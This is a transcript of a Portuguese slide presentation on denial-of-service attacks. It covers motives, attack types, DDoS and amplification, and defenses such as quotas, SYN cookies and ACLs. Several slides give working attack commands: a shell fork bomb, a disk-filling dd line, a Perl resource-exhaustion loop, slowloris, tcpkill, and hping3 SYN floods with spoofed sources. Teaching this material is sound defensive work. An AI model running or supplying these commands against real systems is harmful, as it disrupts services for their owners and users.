GRIS - Denial of Service - Apresentação sobre DoS.
-
Upload
herbert-de-carvalho -
Category
Documents
-
view
215 -
download
2
description
Transcript of GRIS - Denial of Service - Apresentação sobre DoS.
![Page 1: GRIS - Denial of Service - Apresentação sobre DoS.](https://reader033.fdocument.pub/reader033/viewer/2022051704/568c4efb1a28ab4916aa117f/html5/thumbnails/1.jpg)
Ataques de Negaçãode Serviços (DoS)
George Lucas Breno G. de Oliveira
![Page 2: GRIS - Denial of Service - Apresentação sobre DoS.](https://reader033.fdocument.pub/reader033/viewer/2022051704/568c4efb1a28ab4916aa117f/html5/thumbnails/2.jpg)
Negação de Serviços >> Definição
Investida contra serviços e recursos digitais
● Desempenho extremamente baixo
● Indisponibilidade completa(ativa ou passiva)
![Page 3: GRIS - Denial of Service - Apresentação sobre DoS.](https://reader033.fdocument.pub/reader033/viewer/2022051704/568c4efb1a28ab4916aa117f/html5/thumbnails/3.jpg)
Negação de Serviços >> Motivação
Vandalismo
DNS Attack Downs Internet in Parts of Chinahttp://www.pcworld.com/businesscenter/article/165319/dns_attack_downs_internet_in_parts_of_china.html
http://www.zone-h.org
![Page 4: GRIS - Denial of Service - Apresentação sobre DoS.](https://reader033.fdocument.pub/reader033/viewer/2022051704/568c4efb1a28ab4916aa117f/html5/thumbnails/4.jpg)
Negação de Serviços >> Motivação
Chantagem
“Botnets can be used to blackmail targeted sites”http://www.usatoday.com/tech/news/computersecurity/2008-03-16-bot-side_N.htm
“Online Russian blackmail gang jailedfor extorting $4m from gambling websites”http://www.sophos.com/pressoffice/news/articles/2006/10/extort-ddos-blackmail.html
![Page 5: GRIS - Denial of Service - Apresentação sobre DoS.](https://reader033.fdocument.pub/reader033/viewer/2022051704/568c4efb1a28ab4916aa117f/html5/thumbnails/5.jpg)
Negação de Serviços >> Motivação
“Ativismo” (Ciber-terrorismo)
“DDoS attack boots Kyrgyzstan from net”http://www.theregister.co.uk/2009/01/28/kyrgyzstan_knocked_offline/
“O maior cyberataque do Planeta”http://olhardigital.uol.com.br/central_de_videos/video_wide.php?id_conteudo=8514
Activists Launch Hack Attacks on Tehran Regimehttp://www.wired.com/dangerroom/2009/06/activists-launch-hack-attacks-on-tehran-regime/
![Page 6: GRIS - Denial of Service - Apresentação sobre DoS.](https://reader033.fdocument.pub/reader033/viewer/2022051704/568c4efb1a28ab4916aa117f/html5/thumbnails/6.jpg)
Negação de Serviços >> Motivação
Ataques elaborados(geralmente envolvendo “spoofing”)
![Page 7: GRIS - Denial of Service - Apresentação sobre DoS.](https://reader033.fdocument.pub/reader033/viewer/2022051704/568c4efb1a28ab4916aa117f/html5/thumbnails/7.jpg)
Negação de Serviços >> Motivação
Ataques elaborados(geralmente envolvendo “spoofing”)
![Page 8: GRIS - Denial of Service - Apresentação sobre DoS.](https://reader033.fdocument.pub/reader033/viewer/2022051704/568c4efb1a28ab4916aa117f/html5/thumbnails/8.jpg)
Negação de Serviços >> Tipos
● Consumo de recursos computacionais comobanda, espaço em disco ou tempo de CPU
● Quebra de arquivos de configuração
● Quebra de informação de estados
● Quebra de componentes físicos
● Obstrução de canais de comunicação
![Page 9: GRIS - Denial of Service - Apresentação sobre DoS.](https://reader033.fdocument.pub/reader033/viewer/2022051704/568c4efb1a28ab4916aa117f/html5/thumbnails/9.jpg)
Negação de Serviços >> Ataques Locais
● Exploram erros em aplicações...
● ...ou entopem algum recurso(CPU, Memória, disco, etc)
![Page 10: GRIS - Denial of Service - Apresentação sobre DoS.](https://reader033.fdocument.pub/reader033/viewer/2022051704/568c4efb1a28ab4916aa117f/html5/thumbnails/10.jpg)
Negação de Serviços >> Ataques Locais
$ dd if=/dev/zero of=/var/spool/mail/MEU_USUARIO
$ :(){ :|:& };:
$ perl e 'while(1) { fork(); open $fh, “</proc/meminfo”; open $hf, “>/tmp/bla”; }'
![Page 11: GRIS - Denial of Service - Apresentação sobre DoS.](https://reader033.fdocument.pub/reader033/viewer/2022051704/568c4efb1a28ab4916aa117f/html5/thumbnails/11.jpg)
Negação de Serviços >> Ataques em Rede
● Ataques Remotos Simples (DoS remoto)
● Ataques Distribuídos (DDoS)
● Ataques Distribuídos Refletidos (DRDoS)
● Ataques de Amplificação
● Ataques Permanentes (PDoS)
![Page 12: GRIS - Denial of Service - Apresentação sobre DoS.](https://reader033.fdocument.pub/reader033/viewer/2022051704/568c4efb1a28ab4916aa117f/html5/thumbnails/12.jpg)
Negação de Serviços >> Ataques em Rede
Ataques Remotos Simples (DoS remoto)
![Page 13: GRIS - Denial of Service - Apresentação sobre DoS.](https://reader033.fdocument.pub/reader033/viewer/2022051704/568c4efb1a28ab4916aa117f/html5/thumbnails/13.jpg)
Negação de Serviços >> Ataques em Rede
Ataques Remotos Simples (DoS remoto)
requisição maliciosa
![Page 14: GRIS - Denial of Service - Apresentação sobre DoS.](https://reader033.fdocument.pub/reader033/viewer/2022051704/568c4efb1a28ab4916aa117f/html5/thumbnails/14.jpg)
Negação de Serviços >> Ataques em Rede
Ataques Remotos Simples (DoS remoto)
![Page 15: GRIS - Denial of Service - Apresentação sobre DoS.](https://reader033.fdocument.pub/reader033/viewer/2022051704/568c4efb1a28ab4916aa117f/html5/thumbnails/15.jpg)
Negação de Serviços >> Ataques em Rede
Ataques Remotos Simples (DoS remoto)
Alvos podem ser servidores...● SSH, SSL/TLS, HTTP, VoIP
Ou clientes!● Navegadores, Plugins, Sistemas Operacionais
![Page 16: GRIS - Denial of Service - Apresentação sobre DoS.](https://reader033.fdocument.pub/reader033/viewer/2022051704/568c4efb1a28ab4916aa117f/html5/thumbnails/16.jpg)
Negação de Serviços >> Ataques a HTTP
# ./slowloris.pl dns www.example.com port 80 timeout 2000 num 500 tcpto 5
Slow Loris
● Identifica janela de timeout de servidores HTTP/HTTPS (incluindo vhosts) ou Proxies
● Realiza ataques DoS eficientes sem aumentara carga do sistema alvo (ou exigir mais de um atacante)
● Consegue contornar proteção HTTPReady
● Consegue evitar Cache (experimental)
![Page 17: GRIS - Denial of Service - Apresentação sobre DoS.](https://reader033.fdocument.pub/reader033/viewer/2022051704/568c4efb1a28ab4916aa117f/html5/thumbnails/17.jpg)
Negação de Serviços >> Ataques em Rede
Ataques Remotos Simples (Obstrução de Canais)
# tcpnice i eth0 EXPRESSAO_FILTRO
# tcpkill i eth0 [1..9] EXPRESSAO_FILTRO
![Page 18: GRIS - Denial of Service - Apresentação sobre DoS.](https://reader033.fdocument.pub/reader033/viewer/2022051704/568c4efb1a28ab4916aa117f/html5/thumbnails/18.jpg)
Negação de Serviços >> Ataques em Rede
Ataques Remotos Simples(SYN Flood)
SYN Flood tradicional (1 x 1)
# hping3 flood interface eth0 S p PORTA_ALVO IP_ALVO
![Page 19: GRIS - Denial of Service - Apresentação sobre DoS.](https://reader033.fdocument.pub/reader033/viewer/2022051704/568c4efb1a28ab4916aa117f/html5/thumbnails/19.jpg)
Negação de Serviços >> Ataques em Rede
SYN Flood tradicional (1 x 1) com spoofing de origem
Ataques Remotos Simples(SYN Flood)
# hping3 flood spoof IP_ORIGEM (ou –rand_source) S p PORTA_ALVO IP_ALVO
![Page 20: GRIS - Denial of Service - Apresentação sobre DoS.](https://reader033.fdocument.pub/reader033/viewer/2022051704/568c4efb1a28ab4916aa117f/html5/thumbnails/20.jpg)
Negação de Serviços >> Ataques em Rede
SYN Flood tradicional (1 x 1) com intermediário
Ataques Remotos Simples(SYN Flood)
![Page 21: GRIS - Denial of Service - Apresentação sobre DoS.](https://reader033.fdocument.pub/reader033/viewer/2022051704/568c4efb1a28ab4916aa117f/html5/thumbnails/21.jpg)
Negação de Serviços >> Ataques em Rede
Ataques Distribuídos (DDoS)
SYN Flood Distribuído (3 x 1)
![Page 22: GRIS - Denial of Service - Apresentação sobre DoS.](https://reader033.fdocument.pub/reader033/viewer/2022051704/568c4efb1a28ab4916aa117f/html5/thumbnails/22.jpg)
Negação de Serviços >> Ataques em Rede
Ataques Distribuídos (DDoS)
SYN Flood Distribuído (N x 1)
![Page 23: GRIS - Denial of Service - Apresentação sobre DoS.](https://reader033.fdocument.pub/reader033/viewer/2022051704/568c4efb1a28ab4916aa117f/html5/thumbnails/23.jpg)
Negação de Serviços >> Ataques em Rede
Ataques Distribuídos Refletidos (DRDoS)
Refletor: qualquer host que retorne um pacote ao receber um pacote
![Page 24: GRIS - Denial of Service - Apresentação sobre DoS.](https://reader033.fdocument.pub/reader033/viewer/2022051704/568c4efb1a28ab4916aa117f/html5/thumbnails/24.jpg)
Negação de Serviços >> Ataques em Rede
Ataques Distribuídos Refletidos (DRDoS)
Refletor: qualquer host que retorne um pacote ao receber um pacote
(IP falso)
![Page 25: GRIS - Denial of Service - Apresentação sobre DoS.](https://reader033.fdocument.pub/reader033/viewer/2022051704/568c4efb1a28ab4916aa117f/html5/thumbnails/25.jpg)
Negação de Serviços >> Ataques em Rede
Ataques Distribuídos Refletidos (DRDoS)
Refletores Especiais: Acesse um host, receba resposta de vários hosts (“broadcast”)
![Page 26: GRIS - Denial of Service - Apresentação sobre DoS.](https://reader033.fdocument.pub/reader033/viewer/2022051704/568c4efb1a28ab4916aa117f/html5/thumbnails/26.jpg)
Negação de Serviços >> Ataques em Rede
Ataques Distribuídos Refletidos (DRDoS)
Refletores Especiais: Acesse um host, receba resposta de vários hosts (“broadcast”)
![Page 27: GRIS - Denial of Service - Apresentação sobre DoS.](https://reader033.fdocument.pub/reader033/viewer/2022051704/568c4efb1a28ab4916aa117f/html5/thumbnails/27.jpg)
Negação de Serviços >> Ataques em Rede
Ataques Distribuídos Refletidos (DRDoS)
Refletores Especiais: Acesse um host, receba resposta de vários hosts (“broadcast”)
(IP falso)
![Page 28: GRIS - Denial of Service - Apresentação sobre DoS.](https://reader033.fdocument.pub/reader033/viewer/2022051704/568c4efb1a28ab4916aa117f/html5/thumbnails/28.jpg)
Negação de Serviços >> Ataques em Rede
Ataques de Amplificação
> dig @nameserver ns .;; QUESTION SECTION:;. IN NS
;; ANSWER SECTION:. 7439 IN NS B.ROOTSERVERS.NET.. 7439 IN NS D.ROOTSERVERS.NET.. 7439 IN NS H.ROOTSERVERS.NET.. 7439 IN NS F.ROOTSERVERS.NET.. 7439 IN NS E.ROOTSERVERS.NET. (...);; MSG SIZE rcvd: 228
http://www.secureworks.com/research/threats/dns-amplification/?threat=dns-amplification
![Page 29: GRIS - Denial of Service - Apresentação sobre DoS.](https://reader033.fdocument.pub/reader033/viewer/2022051704/568c4efb1a28ab4916aa117f/html5/thumbnails/29.jpg)
Negação de Serviços >> Ataques em Rede
Ataques de Amplificação
> dig @a.dns.br +bufsize=4096 +dnssec any br;; QUESTION SECTION:;br. IN ANY
;; ANSWER SECTION:br. 172800 IN NS a.dns.br.br. 172800 IN NS b.dns.br.br. 172800 IN NS c.dns.br.br. 172800 IN NS d.dns.br.br. 172800 IN NS e.dns.br.br. 172800 IN NS f.dns.br.br. 172800 IN RRSIG NS 5 1 172800 20090709050001 20090702050001 12063 br. Q4IN1ZgHXbNdy9mIHAaj17G8ylyWYGHTws(...);; MSG SIZE rcvd: 1621
![Page 30: GRIS - Denial of Service - Apresentação sobre DoS.](https://reader033.fdocument.pub/reader033/viewer/2022051704/568c4efb1a28ab4916aa117f/html5/thumbnails/30.jpg)
Negação de Serviços >> Ataques em Rede
Ataques Permanentes (PDoS)
http://eusecwest.com/esw08/esw08-smith.pdf
● Exigem reposição do hardware após ataque (“Bricking”)
● Ataques a firmware
● Explorando atualização da flash (“phlashing”)
● PhlashDance Fuzzer
![Page 31: GRIS - Denial of Service - Apresentação sobre DoS.](https://reader033.fdocument.pub/reader033/viewer/2022051704/568c4efb1a28ab4916aa117f/html5/thumbnails/31.jpg)
Negação de Serviços >> Ataques Clássicos
● Smurf Attack➔ pedidos ICMP para endereços de broadcast
com IP da vítima como origem
● Ping flood➔ mais pedidos ICMP echo do que
a vítima pode tratar
● Teardrop/Nuke➔ pacotes fragmentados e inválidos
● Ping of Death➔ pacote ping (ICMP echo)
maior que 65535 bytes
![Page 32: GRIS - Denial of Service - Apresentação sobre DoS.](https://reader033.fdocument.pub/reader033/viewer/2022051704/568c4efb1a28ab4916aa117f/html5/thumbnails/32.jpg)
ZOMBIES
ate my ban
dwidth!
Attack of theSpace Zombie Computersfrom Hell!
Identificando Máquinas Zumbi – O Filme
![Page 33: GRIS - Denial of Service - Apresentação sobre DoS.](https://reader033.fdocument.pub/reader033/viewer/2022051704/568c4efb1a28ab4916aa117f/html5/thumbnails/33.jpg)
Identificando Máquinas Zumbi
● Análise de Tráfego (Manual/NIDS)
● Antivírus
● Política de Segurança
![Page 34: GRIS - Denial of Service - Apresentação sobre DoS.](https://reader033.fdocument.pub/reader033/viewer/2022051704/568c4efb1a28ab4916aa117f/html5/thumbnails/34.jpg)
Protegendo-se de Ataques Locais
● Sistemas atualizados
● Particionamento de disco
● Cotas
● ACLs
![Page 35: GRIS - Denial of Service - Apresentação sobre DoS.](https://reader033.fdocument.pub/reader033/viewer/2022051704/568c4efb1a28ab4916aa117f/html5/thumbnails/35.jpg)
Protegendo-se de Ataques Remotos
● Sistemas atualizados
● Topologia de rede bem estruturada
● Firewalls
● SYN Cookies
● ACLs em roteadores e switches
● Rotas e Faixas de IP alternativas
![Page 36: GRIS - Denial of Service - Apresentação sobre DoS.](https://reader033.fdocument.pub/reader033/viewer/2022051704/568c4efb1a28ab4916aa117f/html5/thumbnails/36.jpg)
Obrigado!
Dúvidas?